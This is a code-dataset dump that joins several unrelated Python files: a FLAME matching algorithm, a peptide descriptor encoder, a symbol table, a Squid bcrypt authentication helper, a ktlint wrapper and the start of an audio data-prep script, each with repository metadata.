flat_units_in_g = np.concatenate(units_in_g).ravel()
unique_units, occurrences = np.unique(flat_units_in_g, return_counts=True)
for index in range(len(unique_units)):
weights['weights'][unique_units[index]] += occurrences[index]
# Now remove the matched units
df_unmatched.drop(matched_rows.index, inplace=True)
if repeats == False:
df_all = df_unmatched
# set up all the extra dfs if needed
if missing_holdout_replace != False:
# now df_holdout is actually an array of imputed datasets
df_holdout_array = flame_dame_helpers.create_mice_dfs(
df_holdout, missing_holdout_replace, outcome_column_name)
else:
# df_holdout_array exists regardless, just size 1 and equal to itself
# if not doing mice.
df_holdout_array = list()
df_holdout_array.append(df_holdout)
h = 1 # The iteration number
if verbose == 3:
flame_dame_helpers.verbose_output(h, len(MG_units),
df_unmatched[treatment_column_name].sum(), len(df_unmatched),
orig_len_df_all, orig_tot_treated, 0, orig_len_df_all, set())
prev_iter_num_unmatched = len(df_unmatched) # this is for output progress
consider_dropping = set(i for i in all_covs)
prev_dropped = set()
# Here, we begin the iterative dropping procedure of FLAME
while True:
# see if any stopping criteria have been met
if (flame_dame_helpers.stop_iterating(early_stops, df_unmatched,
repeats, treatment_column_name,
orig_len_df_all, h,
orig_tot_treated,
consider_dropping)):
break
new_drop, pe, matched_rows, return_matches, bf, units_in_g = decide_drop(all_covs,
consider_dropping, prev_dropped, df_all, treatment_column_name,
outcome_column_name, df_holdout_array, adaptive_weights, alpha,
df_unmatched, return_matches, C, weight_array)
# Check for error in above step:
if (new_drop == False):
raise Exception("There may have been an error in your choice of "\
"machine learning algorithm used to choose the "\
"covariate to drop. For help, please reach on "\
"github to the team. ")
break
if (len(units_in_g)) != 0:
# add the newly matched groups to MG_units, which tracks units in groups
MG_units = MG_units + units_in_g
# update unit weights for all units which appear in the new groups
# flatten to 1 list, then add occurrences of unique units
flat_units_in_g = np.concatenate(units_in_g).ravel()
unique_units, occurrences = np.unique(flat_units_in_g, return_counts=True)
for index in range(len(unique_units)):
weights['weights'][unique_units[index]] += occurrences[index]
return_pe.append(pe)
if (want_bf == True):
# if we need to track the bf, do so.
return_bf.append(bf)
if (early_stops.pe != False):
if pe >= early_stops.pe:
print((orig_len_df_all - len(df_unmatched)), "units matched. "\
"We stopped matching with a pe of ", pe)
break
# Update covariate groups for future iterations
consider_dropping = consider_dropping.difference([new_drop])
prev_dropped.add(new_drop)
# Remove matches.
df_unmatched = df_unmatched.drop(matched_rows.index, errors='ignore')
if repeats == False:
df_all = df_unmatched
h += 1
# End of iter. Prints output based on verbose.
if verbose == 1:
print("Iteration number: ", h)
if ((verbose == 2 and (h%10==0)) or verbose == 3):
flame_dame_helpers.verbose_output(h, len(MG_units),
df_unmatched[treatment_column_name].sum(), len(df_unmatched),
orig_len_df_all, orig_tot_treated, pe, prev_iter_num_unmatched,
new_drop)
if want_bf == True:
print("\tBalancing Factor of this iteration: ", bf)
# Do we switch to DAME?
if (pre_dame != False and pre_dame <= h):
# drop the columns that have already been matched on
for i in prev_dropped:
df_all = df_all.loc[:, df_all.columns.drop(i)]
df_holdout = df_holdout.loc[:, df_holdout.columns.drop(i)]
# call dame algorithm
print((orig_len_df_all - len(df_unmatched)), "units matched. "\
"Moving to DAME algorithm")
return_matches_dame = dame_algorithm.algo1(
df_all, treatment_column_name, weight_array,
outcome_column_name, adaptive_weights, alpha, df_holdout,
repeats, want_pe, verbose, want_bf, missing_holdout_replace,
early_stops)
# when dame is done, we
# return the matches we made here, plus the matches made in dame.
# but first, make sure anything not matched isn't in the df:
return_matches = return_matches.dropna(axis=0) #drop rows with nan
return_matches = return_matches.join(weights)
return_package = [return_matches, MG_units]
if (want_pe == True):
return_package.append(return_pe)
if (want_bf == True):
return_package.append(return_bf)
return_package.append(return_matches_dame)
return return_package
# end loop.
return_matches = return_matches.dropna(axis=0) #drop rows with nan
return_package = [return_matches]
# append weights and MGs to return package
return_package[0] = return_package[0].join(weights)
return_package.append(MG_units)
if (want_pe == True):
return_package.append(return_pe)
if (want_bf == True):
return_package.append(return_bf)
return return_package
| 40.865815 | 99 | 0.633258 |
import pandas as pd
import numpy as np
from . import grouped_mr
from . import dame_algorithm
from . import flame_dame_helpers
def decide_drop(all_covs, consider_dropping, prev_drop, df_all,
treatment_column_name, outcome_column_name, df_holdout_array,
adaptive_weights, alpha_given, df_unmatched, return_matches,
C, weight_array):
best_drop = 0
best_mq = float("-inf")
best_return_matches = 0
best_matched_rows = 0
best_bf = 0
best_pe = 0
best_units_in_g = 0
if adaptive_weights == False:
min_covar_weight = 1
best_drop = 0
for poss_drop in consider_dropping:
index_in_all_covs = all_covs.index(poss_drop)
covar_weight = weight_array[index_in_all_covs]
if covar_weight < min_covar_weight:
min_covar_weight = covar_weight
best_drop = poss_drop
all_covs = set(all_covs)
covs_match_on = all_covs.difference([best_drop]).difference(prev_drop)
covs_match_on = list(covs_match_on)
df_all_temp = df_all.copy(deep=True)
return_matches_temp = return_matches.copy(deep=True)
matched_rows, return_matches, units_in_g = grouped_mr.algo2_GroupedMR(
df_all_temp, df_unmatched, covs_match_on, all_covs,
treatment_column_name, outcome_column_name, return_matches_temp)
# find the BF for this covariate set's match.
BF = flame_dame_helpers.compute_bf(matched_rows,
treatment_column_name, df_unmatched)
return best_drop, 0, matched_rows, return_matches, BF, units_in_g
else:
for poss_drop in consider_dropping:
s = prev_drop.union([poss_drop])
PE = flame_dame_helpers.find_pe_for_covar_set(
df_holdout_array, treatment_column_name, outcome_column_name, s,
adaptive_weights, alpha_given)
if PE == False and type(PE) == bool:
return False, False, False, False, False
all_covs = set(all_covs)
covs_match_on = all_covs.difference([poss_drop]).difference(prev_drop)
covs_match_on = list(covs_match_on)
df_all_temp = df_all.copy(deep=True)
return_matches_temp = return_matches.copy(deep=True)
matched_rows, return_matches_temp, units_in_g = grouped_mr.algo2_GroupedMR(
df_all_temp, df_unmatched, covs_match_on, all_covs,
treatment_column_name, outcome_column_name, return_matches_temp)
# find the BF for this covariate set's match.
BF = flame_dame_helpers.compute_bf(
matched_rows, treatment_column_name, df_unmatched)
MQ = C * BF - PE
if MQ > best_mq:
best_mq = MQ
best_pe = PE
best_bf = BF
best_drop = poss_drop
best_return_matches = return_matches_temp
best_matched_rows = matched_rows
best_units_in_g = units_in_g
return best_drop, best_pe, best_matched_rows, best_return_matches, best_bf, best_units_in_g
def flame_generic(df_all, treatment_column_name, weight_array,
outcome_column_name, adaptive_weights, alpha, df_holdout,
repeats, want_pe, verbose, want_bf, missing_holdout_replace,
early_stops, pre_dame, C):
all_covs = df_all.columns.tolist()
all_covs.remove(treatment_column_name)
all_covs.remove(outcome_column_name)
df_unmatched = df_all.copy(deep=True)
return_pe= []
return_bf = []
MG_units = []
weights = pd.DataFrame(np.zeros(shape=(len(df_all.index),1)),
columns = ['weights'],
index = df_all.index)
return_matches = pd.DataFrame(columns=all_covs, index=df_all.index)
orig_len_df_all = len(df_all)
orig_tot_treated = df_all[treatment_column_name].sum()
covs_match_on = all_covs
matched_rows, return_matches, units_in_g = grouped_mr.algo2_GroupedMR(
df_all, df_unmatched, covs_match_on, all_covs, treatment_column_name,
outcome_column_name, return_matches)
if (len(units_in_g)) != 0:
MG_units = MG_units + units_in_g
flat_units_in_g = np.concatenate(units_in_g).ravel()
unique_units, occurrences = np.unique(flat_units_in_g, return_counts=True)
for index in range(len(unique_units)):
weights['weights'][unique_units[index]] += occurrences[index]
df_unmatched.drop(matched_rows.index, inplace=True)
if repeats == False:
df_all = df_unmatched
if missing_holdout_replace != False:
df_holdout_array = flame_dame_helpers.create_mice_dfs(
df_holdout, missing_holdout_replace, outcome_column_name)
else:
df_holdout_array = list()
df_holdout_array.append(df_holdout)
h = 1
if verbose == 3:
flame_dame_helpers.verbose_output(h, len(MG_units),
df_unmatched[treatment_column_name].sum(), len(df_unmatched),
orig_len_df_all, orig_tot_treated, 0, orig_len_df_all, set())
prev_iter_num_unmatched = len(df_unmatched)
consider_dropping = set(i for i in all_covs)
prev_dropped = set()
while True:
if (flame_dame_helpers.stop_iterating(early_stops, df_unmatched,
repeats, treatment_column_name,
orig_len_df_all, h,
orig_tot_treated,
consider_dropping)):
break
new_drop, pe, matched_rows, return_matches, bf, units_in_g = decide_drop(all_covs,
consider_dropping, prev_dropped, df_all, treatment_column_name,
outcome_column_name, df_holdout_array, adaptive_weights, alpha,
df_unmatched, return_matches, C, weight_array)
if (new_drop == False):
raise Exception("There may have been an error in your choice of "\
"machine learning algorithm used to choose the "\
"covariate to drop. For help, please reach on "\
"github to the team. ")
break
if (len(units_in_g)) != 0:
MG_units = MG_units + units_in_g
flat_units_in_g = np.concatenate(units_in_g).ravel()
unique_units, occurrences = np.unique(flat_units_in_g, return_counts=True)
for index in range(len(unique_units)):
weights['weights'][unique_units[index]] += occurrences[index]
return_pe.append(pe)
if (want_bf == True):
return_bf.append(bf)
if (early_stops.pe != False):
if pe >= early_stops.pe:
print((orig_len_df_all - len(df_unmatched)), "units matched. "\
"We stopped matching with a pe of ", pe)
break
consider_dropping = consider_dropping.difference([new_drop])
prev_dropped.add(new_drop)
df_unmatched = df_unmatched.drop(matched_rows.index, errors='ignore')
if repeats == False:
df_all = df_unmatched
h += 1
if verbose == 1:
print("Iteration number: ", h)
if ((verbose == 2 and (h%10==0)) or verbose == 3):
flame_dame_helpers.verbose_output(h, len(MG_units),
df_unmatched[treatment_column_name].sum(), len(df_unmatched),
orig_len_df_all, orig_tot_treated, pe, prev_iter_num_unmatched,
new_drop)
if want_bf == True:
print("\tBalancing Factor of this iteration: ", bf)
if (pre_dame != False and pre_dame <= h):
for i in prev_dropped:
df_all = df_all.loc[:, df_all.columns.drop(i)]
df_holdout = df_holdout.loc[:, df_holdout.columns.drop(i)]
print((orig_len_df_all - len(df_unmatched)), "units matched. "\
"Moving to DAME algorithm")
return_matches_dame = dame_algorithm.algo1(
df_all, treatment_column_name, weight_array,
outcome_column_name, adaptive_weights, alpha, df_holdout,
repeats, want_pe, verbose, want_bf, missing_holdout_replace,
early_stops)
return_matches = return_matches.dropna(axis=0) #drop rows with nan
return_matches = return_matches.join(weights)
return_package = [return_matches, MG_units]
if (want_pe == True):
return_package.append(return_pe)
if (want_bf == True):
return_package.append(return_bf)
return_package.append(return_matches_dame)
return return_package
# end loop.
return_matches = return_matches.dropna(axis=0) #drop rows with nan
return_package = [return_matches]
# append weights and MGs to return package
return_package[0] = return_package[0].join(weights)
return_package.append(MG_units)
if (want_pe == True):
return_package.append(return_pe)
if (want_bf == True):
return_package.append(return_bf)
return return_package
| true | true |
1c3c9ce7ce9d4d8460fe55292648d43120afe501 | 133 | py | Python | 001146StepikPyBegin/Stepik001146PyBeginсh07p01st04С03_symbols_20200420.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 001146StepikPyBegin/Stepik001146PyBeginсh07p01st04С03_symbols_20200420.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 001146StepikPyBegin/Stepik001146PyBeginсh07p01st04С03_symbols_20200420.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | for i in range(6):
print("AAA")
for i in range(5):
print("BBBB")
print("E")
for i in range(9):
print("TTTTT")
print("G")
| 14.777778 | 18 | 0.56391 | for i in range(6):
print("AAA")
for i in range(5):
print("BBBB")
print("E")
for i in range(9):
print("TTTTT")
print("G")
| true | true |
1c3c9eb7ebc2fd35b322c1552efa50e1610c3bf1 | 2,937 | py | Python | peptidereactor/iFeature/codes/NMBroto.py | spaenigs/peptidereactor | 17efcb993505934f5b9c2d63f5cc040bb244dde9 | [
"MIT"
] | 3 | 2021-02-03T12:30:37.000Z | 2021-06-07T07:03:38.000Z | peptidereactor/iFeature/codes/NMBroto.py | spaenigs/peptidereactor | 17efcb993505934f5b9c2d63f5cc040bb244dde9 | [
"MIT"
] | 1 | 2021-01-04T14:52:27.000Z | 2021-01-04T14:52:27.000Z | peptidereactor/iFeature/codes/NMBroto.py | spaenigs/peptidereactor | 17efcb993505934f5b9c2d63f5cc040bb244dde9 | [
"MIT"
] | 1 | 2021-06-09T16:16:16.000Z | 2021-06-09T16:16:16.000Z | #!/usr/bin/env python
#_*_coding:utf-8_*_
import sys, platform, os, re
import argparse
import numpy as np
pPath = os.path.split(os.path.realpath(__file__))[0]
sys.path.append(pPath)
import checkFasta
import readFasta
import saveCode
def NMBroto(fastas, props=['CIDH920105', 'BHAR880101', 'CHAM820101', 'CHAM820102',
'CHOC760101', 'BIGC670101', 'CHAM810101', 'DAYM780201'],
nlag = 30, **kw):
if checkFasta.minSequenceLengthWithNormalAA(fastas) < nlag + 1:
print('Error: all the sequence length should be larger than the nlag+1: ' + str(nlag + 1) + '\n\n')
return 0
AA = 'ARNDCQEGHILKMFPSTWYV'
fileAAidx = re.sub('codes$', '', os.path.split(os.path.realpath(__file__))[0]) + r'\data\AAidx.txt' if platform.system() == 'Windows' else 'peptidereactor/iFeature/data/AAidx.txt'
with open(fileAAidx) as f:
records = f.readlines()[1:]
myDict = {}
for i in records:
array = i.rstrip().split('\t')
myDict[array[0]] = array[1:]
AAidx = []
AAidxName = []
for i in props:
if i in myDict:
AAidx.append(myDict[i])
AAidxName.append(i)
else:
print('"' + i + '" properties not exist.')
return None
AAidx1 = np.array([float(j) for i in AAidx for j in i])
AAidx = AAidx1.reshape((len(AAidx),20))
pstd = np.std(AAidx, axis=1)
pmean = np.average(AAidx, axis=1)
for i in range(len(AAidx)):
for j in range(len(AAidx[i])):
AAidx[i][j] = (AAidx[i][j] - pmean[i]) / pstd[i]
index = {}
for i in range(len(AA)):
index[AA[i]] = i
encodings = []
header = ['#']
for p in props:
for n in range(1, nlag + 1):
header.append(p + '.lag' + str(n))
encodings.append(header)
for i in fastas:
name, sequence = i[0], re.sub('-', '', i[1])
code = [name]
N = len(sequence)
for prop in range(len(props)):
for n in range(1, nlag + 1):
if len(sequence) > nlag:
# if key is '-', then the value is 0
rn = sum([AAidx[prop][index.get(sequence[j], 0)] * AAidx[prop][index.get(sequence[j + n], 0)] for j in range(len(sequence)-n)]) / (N - n)
else:
rn = 'NA'
code.append(rn)
encodings.append(code)
return encodings
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage="it's usage tip.",
description="Moran descriptor")
parser.add_argument("--file", required=True, help="input fasta file")
parser.add_argument("--props", help="input fasta file")
parser.add_argument("--nlag", help="input fasta file")
parser.add_argument("--out", dest='outFile', help="the generated descriptor file")
args = parser.parse_args()
fastas = readFasta.readFasta(args.file)
props = args.props.split(':') if args.props != None else ['CIDH920105', 'BHAR880101', 'CHAM820101', 'CHAM820102',
'CHOC760101', 'BIGC670101', 'CHAM810101', 'DAYM780201']
nlag = int(args.nlag) if args.nlag != None else 30
output = args.outFile if args.outFile != None else 'encoding.tsv'
encodings = NMBroto(fastas, props, nlag)
saveCode.savetsv(encodings, output) | 33 | 180 | 0.653388 |
import sys, platform, os, re
import argparse
import numpy as np
pPath = os.path.split(os.path.realpath(__file__))[0]
sys.path.append(pPath)
import checkFasta
import readFasta
import saveCode
def NMBroto(fastas, props=['CIDH920105', 'BHAR880101', 'CHAM820101', 'CHAM820102',
'CHOC760101', 'BIGC670101', 'CHAM810101', 'DAYM780201'],
nlag = 30, **kw):
if checkFasta.minSequenceLengthWithNormalAA(fastas) < nlag + 1:
print('Error: all the sequence length should be larger than the nlag+1: ' + str(nlag + 1) + '\n\n')
return 0
AA = 'ARNDCQEGHILKMFPSTWYV'
fileAAidx = re.sub('codes$', '', os.path.split(os.path.realpath(__file__))[0]) + r'\data\AAidx.txt' if platform.system() == 'Windows' else 'peptidereactor/iFeature/data/AAidx.txt'
with open(fileAAidx) as f:
records = f.readlines()[1:]
myDict = {}
for i in records:
array = i.rstrip().split('\t')
myDict[array[0]] = array[1:]
AAidx = []
AAidxName = []
for i in props:
if i in myDict:
AAidx.append(myDict[i])
AAidxName.append(i)
else:
print('"' + i + '" properties not exist.')
return None
AAidx1 = np.array([float(j) for i in AAidx for j in i])
AAidx = AAidx1.reshape((len(AAidx),20))
pstd = np.std(AAidx, axis=1)
pmean = np.average(AAidx, axis=1)
for i in range(len(AAidx)):
for j in range(len(AAidx[i])):
AAidx[i][j] = (AAidx[i][j] - pmean[i]) / pstd[i]
index = {}
for i in range(len(AA)):
index[AA[i]] = i
encodings = []
header = ['#']
for p in props:
for n in range(1, nlag + 1):
header.append(p + '.lag' + str(n))
encodings.append(header)
for i in fastas:
name, sequence = i[0], re.sub('-', '', i[1])
code = [name]
N = len(sequence)
for prop in range(len(props)):
for n in range(1, nlag + 1):
if len(sequence) > nlag:
rn = sum([AAidx[prop][index.get(sequence[j], 0)] * AAidx[prop][index.get(sequence[j + n], 0)] for j in range(len(sequence)-n)]) / (N - n)
else:
rn = 'NA'
code.append(rn)
encodings.append(code)
return encodings
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage="it's usage tip.",
description="Moran descriptor")
parser.add_argument("--file", required=True, help="input fasta file")
parser.add_argument("--props", help="input fasta file")
parser.add_argument("--nlag", help="input fasta file")
parser.add_argument("--out", dest='outFile', help="the generated descriptor file")
args = parser.parse_args()
fastas = readFasta.readFasta(args.file)
props = args.props.split(':') if args.props != None else ['CIDH920105', 'BHAR880101', 'CHAM820101', 'CHAM820102',
'CHOC760101', 'BIGC670101', 'CHAM810101', 'DAYM780201']
nlag = int(args.nlag) if args.nlag != None else 30
output = args.outFile if args.outFile != None else 'encoding.tsv'
encodings = NMBroto(fastas, props, nlag)
saveCode.savetsv(encodings, output) | true | true |
1c3c9f9d6def9ec236cb8b6045ae02325cbe876a | 1,882 | py | Python | mamba/symbol_table.py | laggycomputer/mamba-lang | f3223a23a0051ca06e5c330d204c09372a3dd9cb | [
"MIT"
] | 11 | 2018-11-11T14:13:53.000Z | 2021-12-22T14:37:54.000Z | mamba/symbol_table.py | laggycomputer/mamba-lang | f3223a23a0051ca06e5c330d204c09372a3dd9cb | [
"MIT"
] | 5 | 2018-12-08T20:19:20.000Z | 2020-04-29T12:26:47.000Z | mamba/symbol_table.py | laggycomputer/mamba-lang | f3223a23a0051ca06e5c330d204c09372a3dd9cb | [
"MIT"
] | 4 | 2018-12-08T17:34:34.000Z | 2021-12-22T16:17:44.000Z | from mamba.exceptions import *
class SymbolTable:
__func = "functions"
__sym = "symbols"
__local = "local"
__table = {__func: {}, __sym: {}, __local: []}
def __is_local(self):
"""
Returns true if symbol table is being called from inside
a function rather than the global scope
:return: bool
"""
return len(self.__table[self.__local]) > 0
def table(self):
return self.__table
def get_local_table(self):
"""
Returns the active local symbol table (the last one on the stack)
"""
t = self.__table[self.__local]
return t[len(t) - 1]
def set_local(self, flag):
if flag:
self.__table[self.__local].append({})
else:
self.__table[self.__local].pop()
def get_sym(self, sym):
if self.__is_local():
# Check all the local symbol tables starting from the current one
for tab in reversed(self.__table[self.__local]):
if sym in tab:
return tab[sym]
# if not found check the global scope
if sym in self.__table[self.__sym]:
return self.__table[self.__sym][sym]
# nope... sorry :(
raise SymbolNotFound("Undefined variable '%s'" % sym)
def set_sym(self, sym, val):
if self.__is_local():
self.get_local_table()[sym] = val
else:
self.__table[self.__sym][sym] = val
def get_func(self, name):
if name in self.__table[self.__func]:
return self.__table[self.__func][name]
raise SymbolNotFound("Undefined function '%s'" % name)
def set_func(self, name, val):
if name in self.__table[self.__func]:
raise DuplicateSymbol("Cannot redeclare function '%s'" % name)
self.__table[self.__func][name] = val
| 27.275362 | 77 | 0.575452 | from mamba.exceptions import *
class SymbolTable:
__func = "functions"
__sym = "symbols"
__local = "local"
__table = {__func: {}, __sym: {}, __local: []}
def __is_local(self):
return len(self.__table[self.__local]) > 0
def table(self):
return self.__table
def get_local_table(self):
t = self.__table[self.__local]
return t[len(t) - 1]
def set_local(self, flag):
if flag:
self.__table[self.__local].append({})
else:
self.__table[self.__local].pop()
def get_sym(self, sym):
if self.__is_local():
for tab in reversed(self.__table[self.__local]):
if sym in tab:
return tab[sym]
if sym in self.__table[self.__sym]:
return self.__table[self.__sym][sym]
raise SymbolNotFound("Undefined variable '%s'" % sym)
def set_sym(self, sym, val):
if self.__is_local():
self.get_local_table()[sym] = val
else:
self.__table[self.__sym][sym] = val
def get_func(self, name):
if name in self.__table[self.__func]:
return self.__table[self.__func][name]
raise SymbolNotFound("Undefined function '%s'" % name)
def set_func(self, name, val):
if name in self.__table[self.__func]:
raise DuplicateSymbol("Cannot redeclare function '%s'" % name)
self.__table[self.__func][name] = val
| true | true |
1c3ca0a1143a1916ef7cbeb4266c385ea0c07641 | 229 | py | Python | prettyqt/charts/percentbarseries.py | phil65/PrettyQt | 26327670c46caa039c9bd15cb17a35ef5ad72e6c | [
"MIT"
] | 7 | 2019-05-01T01:34:36.000Z | 2022-03-08T02:24:14.000Z | prettyqt/charts/percentbarseries.py | phil65/PrettyQt | 26327670c46caa039c9bd15cb17a35ef5ad72e6c | [
"MIT"
] | 141 | 2019-04-16T11:22:01.000Z | 2021-04-14T15:12:36.000Z | prettyqt/charts/percentbarseries.py | phil65/PrettyQt | 26327670c46caa039c9bd15cb17a35ef5ad72e6c | [
"MIT"
] | 5 | 2019-04-17T11:48:19.000Z | 2021-11-21T10:30:19.000Z | from __future__ import annotations
from prettyqt import charts
from prettyqt.qt import QtCharts
QtCharts.QPercentBarSeries.__bases__ = (charts.AbstractBarSeries,)
class PercentBarSeries(QtCharts.QPercentBarSeries):
pass
| 19.083333 | 66 | 0.829694 | from __future__ import annotations
from prettyqt import charts
from prettyqt.qt import QtCharts
QtCharts.QPercentBarSeries.__bases__ = (charts.AbstractBarSeries,)
class PercentBarSeries(QtCharts.QPercentBarSeries):
pass
| true | true |
1c3ca0d145d0d7bb16b0dbfbb70bbf79a88b8932 | 2,937 | py | Python | src/basic_bcrypt_auth.py | krayzpipes/squid-bcrypt | 09f7c255865aa5102e9a657c53101dde85db2414 | [
"Apache-2.0"
] | null | null | null | src/basic_bcrypt_auth.py | krayzpipes/squid-bcrypt | 09f7c255865aa5102e9a657c53101dde85db2414 | [
"Apache-2.0"
] | null | null | null | src/basic_bcrypt_auth.py | krayzpipes/squid-bcrypt | 09f7c255865aa5102e9a657c53101dde85db2414 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""Squid helper for authenticating basic auth against bcrypt hashes.
See Authenticator > Basic Scheme here:
https://wiki.squid-cache.org/Features/AddonHelpers
Designed to work with bcrypt hash files created with htpasswd:
EXAMPLE: htpasswd -cbB -C 10 /path/to/password_file username password
This program loads the password file content into memory based on the
assumption the underlying host is ephemeral and the password file is
populated when the host is bootstrapped.
"""
import sys
import bcrypt
def load_hashes_to_memory(filename: str) -> dict:
"""Return dictionary of usernames and bcrypt hashes.
Ex: {'myusername': '$2y$10$UwKsKOkgObpauy5wzcN2euKZ/lgQZCP3A8MQsatZfNdPt5hNUXFae'}
"""
password_kv = {}
with open(filename, 'r') as f:
for line in f:
sections = line.strip().split(':')
try:
user = sections[0].strip().lower()
hash = sections[1].strip()
except IndexError:
raise RuntimeError("password file has invalid content")
else:
password_kv[user] = hash
return password_kv
def write_stdout(response: str) -> None:
"""Write to stdout and flush. Make sure one and
only one newline exists before writing."""
response = response.strip()
sys.stdout.write(f'{response}\n')
sys.stdout.flush()
def run_loop(password_kv: dict) -> None:
"""Validate username and passwords from the squid proxy
using bcrypt."""
while True:
try:
line = sys.stdin.readline()
line = line.strip()
if line == '':
write_stdout('BH message="empty line from proxy')
continue
parts = line.split(' ', 1) # setting maxsplit to 1 makes sure we handle passwords with spaces in them
try:
username = parts[0].strip()
password = parts[1].strip()
except IndexError:
write_stdout('BH message="stdin message invalid format')
continue
password_hash = password_kv.get(username.lower(), None)
if password_hash is None:
write_stdout('ERR message="invalid credentials')
continue
authenticated = bcrypt.checkpw(password.encode('utf-8'), password_hash.encode('utf-8'))
if authenticated:
write_stdout('OK')
continue
write_stdout('ERR message="invalid credentials"')
continue
except Exception:
write_stdout('BH message="unknown error"')
continue
def main():
"""Load hashes from file into memory and start the
bcrypt validation service."""
password_file = sys.argv[1]
user_hash_kv = load_hashes_to_memory(password_file)
run_loop(user_hash_kv)
if __name__ == "__main__":
main()
exit(0)
| 28.514563 | 114 | 0.617297 |
import sys
import bcrypt
def load_hashes_to_memory(filename: str) -> dict:
password_kv = {}
with open(filename, 'r') as f:
for line in f:
sections = line.strip().split(':')
try:
user = sections[0].strip().lower()
hash = sections[1].strip()
except IndexError:
raise RuntimeError("password file has invalid content")
else:
password_kv[user] = hash
return password_kv
def write_stdout(response: str) -> None:
response = response.strip()
sys.stdout.write(f'{response}\n')
sys.stdout.flush()
def run_loop(password_kv: dict) -> None:
while True:
try:
line = sys.stdin.readline()
line = line.strip()
if line == '':
write_stdout('BH message="empty line from proxy')
continue
parts = line.split(' ', 1) # setting maxsplit to 1 makes sure we handle passwords with spaces in them
try:
username = parts[0].strip()
password = parts[1].strip()
except IndexError:
write_stdout('BH message="stdin message invalid format')
continue
password_hash = password_kv.get(username.lower(), None)
if password_hash is None:
write_stdout('ERR message="invalid credentials')
continue
authenticated = bcrypt.checkpw(password.encode('utf-8'), password_hash.encode('utf-8'))
if authenticated:
write_stdout('OK')
continue
write_stdout('ERR message="invalid credentials"')
continue
except Exception:
write_stdout('BH message="unknown error"')
continue
def main():
password_file = sys.argv[1]
user_hash_kv = load_hashes_to_memory(password_file)
run_loop(user_hash_kv)
if __name__ == "__main__":
main()
exit(0)
| true | true |
1c3ca12a5a8495d2fe270c4c214a1f489ee9a871 | 2,015 | py | Python | lintreview/tools/ktlint.py | josemanimala/lint-review | a0abdf2ec29fb63855b5caca36eea6bc2693cc92 | [
"MIT"
] | null | null | null | lintreview/tools/ktlint.py | josemanimala/lint-review | a0abdf2ec29fb63855b5caca36eea6bc2693cc92 | [
"MIT"
] | null | null | null | lintreview/tools/ktlint.py | josemanimala/lint-review | a0abdf2ec29fb63855b5caca36eea6bc2693cc92 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
import logging
import os
import lintreview.docker as docker
from lintreview.tools import Tool, process_checkstyle
log = logging.getLogger(__name__)
class Ktlint(Tool):
name = 'ktlint'
def check_dependencies(self):
"""
See if ktlint is on the system path.
"""
return docker.image_exists('ktlint')
def match_file(self, filename):
"""
Check if a file should be linted using Ktlint.
"""
base = os.path.basename(filename)
name, ext = os.path.splitext(base)
return ext in ('.kt', '.kts')
def process_files(self, files):
"""
Run code checks with ktlint.
"""
log.debug('Processing %s files with %s', files, self.name)
command = self._create_command()
command += files
output = docker.run('ktlint', command, self.base_path)
process_checkstyle(self.problems, output, docker.strip_base)
def _create_command(self):
command = ['ktlint', '--color', '--reporter=checkstyle']
if self.options.get('android', False):
command.append('--android')
if self.options.get('experimental', False):
command.append('--experimental')
if self.options.get('ruleset'):
command += ['-R', self.options.get('ruleset')]
if self.options.get('config'):
command += ['--editorconfig=', self.options.get('config')]
return command
def has_fixer(self):
"""
ktlint has a fixer that can be enabled through configuration.
"""
return bool(self.options.get('fixer', False))
def process_fixer(self, files):
"""Run ktlint in the fixer mode.
"""
command = self.create_fixer_command(files)
docker.run('ktlint', command, self.base_path)
def create_fixer_command(self, files):
command = ['ktlint']
command.append('-F')
command += files
return command
| 29.632353 | 70 | 0.601489 | from __future__ import absolute_import
import logging
import os
import lintreview.docker as docker
from lintreview.tools import Tool, process_checkstyle
log = logging.getLogger(__name__)
class Ktlint(Tool):
name = 'ktlint'
def check_dependencies(self):
return docker.image_exists('ktlint')
def match_file(self, filename):
base = os.path.basename(filename)
name, ext = os.path.splitext(base)
return ext in ('.kt', '.kts')
def process_files(self, files):
log.debug('Processing %s files with %s', files, self.name)
command = self._create_command()
command += files
output = docker.run('ktlint', command, self.base_path)
process_checkstyle(self.problems, output, docker.strip_base)
def _create_command(self):
command = ['ktlint', '--color', '--reporter=checkstyle']
if self.options.get('android', False):
command.append('--android')
if self.options.get('experimental', False):
command.append('--experimental')
if self.options.get('ruleset'):
command += ['-R', self.options.get('ruleset')]
if self.options.get('config'):
command += ['--editorconfig=', self.options.get('config')]
return command
def has_fixer(self):
return bool(self.options.get('fixer', False))
def process_fixer(self, files):
command = self.create_fixer_command(files)
docker.run('ktlint', command, self.base_path)
def create_fixer_command(self, files):
command = ['ktlint']
command.append('-F')
command += files
return command
| true | true |
1c3ca22b1c2e1804997daa4351a616d3fd087936 | 4,422 | py | Python | src/DataPrep.py | BZ-2453/DeepBass | a0f4ab8613994a8cfcf732fa2b2b2840313264d4 | [
"MIT"
] | 1 | 2019-06-05T23:47:32.000Z | 2019-06-05T23:47:32.000Z | src/DataPrep.py | BZ-2453/DeepBass | a0f4ab8613994a8cfcf732fa2b2b2840313264d4 | [
"MIT"
] | null | null | null | src/DataPrep.py | BZ-2453/DeepBass | a0f4ab8613994a8cfcf732fa2b2b2840313264d4 | [
"MIT"
] | 1 | 2018-11-14T02:58:35.000Z | 2018-11-14T02:58:35.000Z | import os
import argparse
from ingestion.IO_utils import Load
import numpy as np
import errno
from preprocess.SilenceRemoval import SR
from preprocess.np_to_tfrecords import np_to_tfrecords
from preprocess.get_time import get_time
from os import listdir
from os.path import isfile, join
from joblib import Parallel, delayed
###############################################################################
# Directory fault checking
class FullPaths(argparse.Action):
"""Expand user- and relative-paths"""
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))
def is_dir(dirname):
"""Checks if a path is an actual directory"""
if not os.path.isdir(dirname):
msg = "{0} is not a directory".format(dirname)
raise argparse.ArgumentTypeError(msg)
else:
return dirname
###############################################################################
def Prep(fname, load_dir, sr, duration_thresh, sample_length, crop_style):
# Remove very long, short, or corrupt audio files.
